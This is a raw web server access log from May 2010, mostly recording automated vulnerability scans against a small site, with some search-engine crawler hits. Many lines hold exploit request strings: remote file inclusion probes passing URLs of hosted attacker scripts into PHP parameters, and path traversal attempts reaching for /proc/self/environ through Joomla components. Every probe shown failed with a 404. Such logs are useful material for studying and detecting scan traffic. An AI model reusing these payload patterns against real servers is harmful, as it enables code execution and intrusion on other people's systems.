81.177.33.14 - - [03/May/2010:08:39:21 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
207.46.13.138 - - [03/May/2010:08:39:24 -0500] "GET /logs/access_log.1198886400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.177.33.14 - - [03/May/2010:08:39:52 -0500] "GET /playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:08:39:52 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:08:39:52 -0500] "GET /logs/access_log.1270684800%20%20/playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:08:43:43 -0500] "GET /logs/access_log.1270684800/playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
180.210.205.118 - - [03/May/2010:08:45:39 -0500] "GET /logs/access_log.1270684800%20%20/playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
180.210.205.118 - - [03/May/2010:08:45:39 -0500] "GET /playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
180.210.205.118 - - [03/May/2010:08:45:39 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
180.210.205.118 - - [03/May/2010:08:46:02 -0500] "GET /playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
180.210.205.118 - - [03/May/2010:08:46:02 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
180.210.205.118 - - [03/May/2010:08:46:02 -0500] "GET /logs/access_log.1270684800%20%20/playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
62.128.135.38 - - [03/May/2010:08:49:05 -0500] "GET //index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
180.210.205.118 - - [03/May/2010:08:49:21 -0500] "GET /playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
180.210.205.118 - - [03/May/2010:08:49:21 -0500] "GET /logs/access_log.1270684800%20%20/playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
180.210.205.118 - - [03/May/2010:08:49:21 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
72.1.240.149 - - [03/May/2010:08:54:25 -0500] "GET /logs//index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
72.1.240.149 - - [03/May/2010:08:54:25 -0500] "GET //index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
72.1.240.149 - - [03/May/2010:08:56:15 -0500] "GET /logs//index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
72.1.240.149 - - [03/May/2010:08:56:15 -0500] "GET //index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
209.221.150.100 - - [03/May/2010:08:56:24 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
209.221.150.100 - - [03/May/2010:08:56:24 -0500] "GET /playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
209.221.150.100 - - [03/May/2010:08:56:24 -0500] "GET /logs/access_log.1270684800%20%20/playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
72.1.240.149 - - [03/May/2010:08:56:41 -0500] "GET //index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
209.221.150.100 - - [03/May/2010:08:56:41 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
209.221.150.100 - - [03/May/2010:08:56:41 -0500] "GET /logs/access_log.1270684800%20%20/playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.221.150.100 - - [03/May/2010:08:56:41 -0500] "GET /playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
72.1.240.149 - - [03/May/2010:08:57:34 -0500] "GET //index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
72.1.240.149 - - [03/May/2010:08:57:45 -0500] "GET /logs//index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
72.1.240.149 - - [03/May/2010:08:57:45 -0500] "GET //index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
72.1.240.149 - - [03/May/2010:08:58:12 -0500] "GET //index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
72.1.240.149 - - [03/May/2010:08:58:37 -0500] "GET //index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
72.1.240.149 - - [03/May/2010:08:59:34 -0500] "GET //index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
72.1.240.149 - - [03/May/2010:08:59:48 -0500] "GET //index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
72.1.240.149 - - [03/May/2010:08:59:55 -0500] "GET //index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
72.1.240.149 - - [03/May/2010:09:01:14 -0500] "GET //index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
72.1.240.149 - - [03/May/2010:09:04:49 -0500] "GET //index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
207.46.13.49 - - [03/May/2010:09:05:25 -0500] "GET /tattoo/links.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.88.4.141 - - [03/May/2010:09:06:05 -0500] "GET /logs/access_log.1264204800/language/lang_english/lang_prillian_faq.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
121.88.4.141 - - [03/May/2010:09:06:05 -0500] "GET /language/lang_english/lang_prillian_faq.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
121.88.4.141 - - [03/May/2010:09:06:06 -0500] "GET /logs/language/lang_english/lang_prillian_faq.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
121.88.4.141 - - [03/May/2010:09:06:51 -0500] "GET /logs/access_log.1264723200/language/lang_english/lang_prillian_faq.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:09:08:17 -0500] "GET /logs/access_log.1264204800/language/lang_english/lang_prillian_faq.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:09:08:17 -0500] "GET /logs/language/lang_english/lang_prillian_faq.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:09:08:19 -0500] "GET /language/lang_english/lang_prillian_faq.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:09:08:22 -0500] "GET /logs/access_log.1264723200/language/lang_english/lang_prillian_faq.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
67.223.230.123 - - [03/May/2010:09:08:41 -0500] "GET /logs//index2.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
67.223.230.123 - - [03/May/2010:09:08:41 -0500] "GET //index2.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
207.46.199.190 - - [03/May/2010:09:11:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.80.108.70 - - [03/May/2010:09:12:25 -0500] "GET /logs//index.php?foing_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:09:12:26 -0500] "GET //index.php?foing_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:09:12:26 -0500] "GET /logs/access_log.1265932800//index.php?foing_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:09:12:33 -0500] "GET /logs/access_log.1266451200//index.php?foing_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [03/May/2010:09:12:34 -0500] "GET /costume/thmb6.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [03/May/2010:09:12:45 -0500] "GET /logs/access_log.1176076800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.223.230.123 - - [03/May/2010:09:13:05 -0500] "GET /logs//index2.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
67.223.230.123 - - [03/May/2010:09:13:05 -0500] "GET //index2.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
67.223.230.123 - - [03/May/2010:09:13:32 -0500] "GET /logs//index2.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
67.223.230.123 - - [03/May/2010:09:13:32 -0500] "GET //index2.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
67.223.230.123 - - [03/May/2010:09:13:33 -0500] "GET /logs//index2.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
67.223.230.123 - - [03/May/2010:09:13:33 -0500] "GET //index2.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
67.223.230.123 - - [03/May/2010:09:14:10 -0500] "GET /logs//index2.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
67.223.230.123 - - [03/May/2010:09:14:10 -0500] "GET //index2.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
67.218.116.131 - - [03/May/2010:09:14:21 -0500] "GET /logs/access_log.1221264000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.194.109 - - [03/May/2010:09:14:45 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.109 - - [03/May/2010:09:14:45 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.109 - - [03/May/2010:09:14:45 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [03/May/2010:09:15:28 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
211.232.85.247 - - [03/May/2010:09:15:29 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
211.232.85.247 - - [03/May/2010:09:15:29 -0500] "GET /logs/access_log.1263254400//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
211.232.85.247 - - [03/May/2010:09:15:29 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:09:15:52 -0500] "GET /logs/access_log.1265932800//index.php?foing_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:09:15:52 -0500] "GET //index.php?foing_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:09:15:52 -0500] "GET /logs//index.php?foing_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:09:15:58 -0500] "GET /logs/access_log.1266451200//index.php?foing_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.199.46 - - [03/May/2010:09:16:24 -0500] "GET /logs/access_log.1165449600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.49.100.254 - - [03/May/2010:09:19:16 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
124.49.100.254 - - [03/May/2010:09:19:16 -0500] "GET /logs/access_log.1270684800%20%20/playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
124.49.100.254 - - [03/May/2010:09:19:16 -0500] "GET /playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
124.49.100.254 - - [03/May/2010:09:21:07 -0500] "GET /logs/access_log.1270684800%20%20/playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
124.49.100.254 - - [03/May/2010:09:21:07 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
124.49.100.254 - - [03/May/2010:09:21:07 -0500] "GET /playing.php/common/db.php?commonpath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
216.129.119.14 - - [03/May/2010:09:21:13 -0500] "GET /logs/access_log.1237680000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.40 - - [03/May/2010:09:21:15 -0500] "GET /logs/access_log.1215907200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
62.128.135.38 - - [03/May/2010:09:25:21 -0500] "GET /logs/access_log.1270598400//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
62.128.135.38 - - [03/May/2010:09:25:21 -0500] "GET //index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
62.128.135.38 - - [03/May/2010:09:25:21 -0500] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
121.190.102.21 - - [03/May/2010:09:26:07 -0500] "GET //sources/functions.php?CONFIG[main_path]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:09:26:07 -0500] "GET /logs//sources/functions.php?CONFIG[main_path]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:09:26:07 -0500] "GET /logs/access_log.1264809600//sources/functions.php?CONFIG[main_path]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:09:26:09 -0500] "GET /logs//sources/functions.php?CONFIG[main_path]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:09:26:09 -0500] "GET //sources/functions.php?CONFIG[main_path]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:09:26:09 -0500] "GET /logs/access_log.1264809600//sources/functions.php?CONFIG[main_path]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
207.46.204.239 - - [03/May/2010:09:28:54 -0500] "GET /logs/access_log.1181260800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.25.16 - - [03/May/2010:09:31:01 -0500] "GET /logs//dloads/dloadsmainincs/dl-authcontent.php?docroot=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.803"
91.121.25.16 - - [03/May/2010:09:31:01 -0500] "GET //dloads/dloadsmainincs/dl-authcontent.php?docroot=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.803"
67.195.112.180 - - [03/May/2010:09:31:27 -0500] "GET /logs/access_log.1262649600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.177 - - [03/May/2010:09:37:55 -0500] "GET /logs/access_log.1250294400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.37 - - [03/May/2010:09:39:24 -0500] "GET /logs/access_log.1211241600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
204.15.190.163 - - [03/May/2010:09:40:08 -0500] "GET //registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
204.15.190.163 - - [03/May/2010:09:40:08 -0500] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
204.15.190.163 - - [03/May/2010:09:40:08 -0500] "GET /logs/access_log.1270684800%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
67.195.112.180 - - [03/May/2010:09:42:59 -0500] "GET /logs/access_log.1216425600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
83.69.115.198 - - [03/May/2010:09:43:17 -0500] "GET /logs/access_log.1268956800////index.php?option=com_gmajax&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.79"
83.69.115.198 - - [03/May/2010:09:43:18 -0500] "GET ////index.php?option=com_gmajax&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.79"
83.69.115.198 - - [03/May/2010:09:43:18 -0500] "GET /logs////index.php?option=com_gmajax&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.79"
83.69.115.198 - - [03/May/2010:09:45:26 -0500] "GET /logs/access_log.1268956800////index.php?option=com_gmajax&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.79"
83.69.115.198 - - [03/May/2010:09:45:26 -0500] "GET ////index.php?option=com_gmajax&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.79"
83.69.115.198 - - [03/May/2010:09:45:27 -0500] "GET /logs////index.php?option=com_gmajax&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.79"
210.125.133.87 - - [03/May/2010:09:49:20 -0500] "GET /logs/phphtml.php?htmlclass_path=http://yudep.yongin.ac.kr/~munbo/gboard/data/scan/gore/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
210.125.133.87 - - [03/May/2010:09:49:20 -0500] "GET /logs/access_log.1270684800%20%20/phphtml.php?htmlclass_path=http://yudep.yongin.ac.kr/~munbo/gboard/data/scan/gore/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
210.125.133.87 - - [03/May/2010:09:49:20 -0500] "GET /phphtml.php?htmlclass_path=http://yudep.yongin.ac.kr/~munbo/gboard/data/scan/gore/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
83.69.115.198 - - [03/May/2010:09:49:30 -0500] "GET /logs/access_log.1268956800////index.php?option=com_gmajax&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.79"
83.69.115.198 - - [03/May/2010:09:49:30 -0500] "GET ////index.php?option=com_gmajax&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.79"
83.69.115.198 - - [03/May/2010:09:49:31 -0500] "GET /logs////index.php?option=com_gmajax&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.79"
83.69.115.198 - - [03/May/2010:09:50:00 -0500] "GET /logs/access_log.1268956800////index.php?option=com_gmajax&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.79"
83.69.115.198 - - [03/May/2010:09:50:00 -0500] "GET ////index.php?option=com_gmajax&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.79"
83.69.115.198 - - [03/May/2010:09:50:01 -0500] "GET /logs////index.php?option=com_gmajax&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.79"
187.45.193.159 - - [03/May/2010:09:50:52 -0500] "GET ///index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
208.115.111.248 - - [03/May/2010:09:55:28 -0500] "GET /logs/access_log.1239494400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
81.177.33.14 - - [03/May/2010:09:59:57 -0500] "GET //main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:09:59:57 -0500] "GET /logs//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:09:59:57 -0500] "GET /logs/access_log.1270598400%20%20//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
67.19.33.58 - - [03/May/2010:10:00:08 -0500] "GET /mcf.php?content=http://www.sunmulwang.com/bbs/kboard/data/freeboard/image1.jpg??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
67.19.33.58 - - [03/May/2010:10:00:08 -0500] "GET /logs/mcf.php?content=http://www.sunmulwang.com/bbs/kboard/data/freeboard/image1.jpg??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
67.19.33.58 - - [03/May/2010:10:00:08 -0500] "GET /logs/access_log.1212969600/mcf.php?content=http://www.sunmulwang.com/bbs/kboard/data/freeboard/image1.jpg??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.231.60.209 - - [03/May/2010:10:00:08 -0500] "GET /allinurl:mod.php?mod=siteinfo&id=http://incesp.com/uranus/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
222.231.60.209 - - [03/May/2010:10:00:09 -0500] "GET /logs/allinurl:mod.php?mod=siteinfo&id=http://incesp.com/uranus/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
222.231.60.209 - - [03/May/2010:10:00:09 -0500] "GET /logs/access_log.1229040000/allinurl:mod.php?mod=siteinfo&id=http://incesp.com/uranus/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
222.231.60.209 - - [03/May/2010:10:00:18 -0500] "GET /logs/allinurl:mod.php?mod=siteinfo&id=http://incesp.com/uranus/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
222.231.60.209 - - [03/May/2010:10:00:18 -0500] "GET /allinurl:mod.php?mod=siteinfo&id=http://incesp.com/uranus/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
222.231.60.209 - - [03/May/2010:10:00:18 -0500] "GET /logs/access_log.1229040000/allinurl:mod.php?mod=siteinfo&id=http://incesp.com/uranus/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
222.231.60.209 - - [03/May/2010:10:00:22 -0500] "GET /logs/access_log.1229040000/allinurl:mod.php?mod=siteinfo&id=http://incesp.com/uranus/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
222.231.60.209 - - [03/May/2010:10:00:22 -0500] "GET /logs/allinurl:mod.php?mod=siteinfo&id=http://incesp.com/uranus/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
222.231.60.209 - - [03/May/2010:10:00:22 -0500] "GET /allinurl:mod.php?mod=siteinfo&id=http://incesp.com/uranus/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
207.46.13.86 - - [03/May/2010:10:00:25 -0500] "GET /logs/access_log.1217289600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
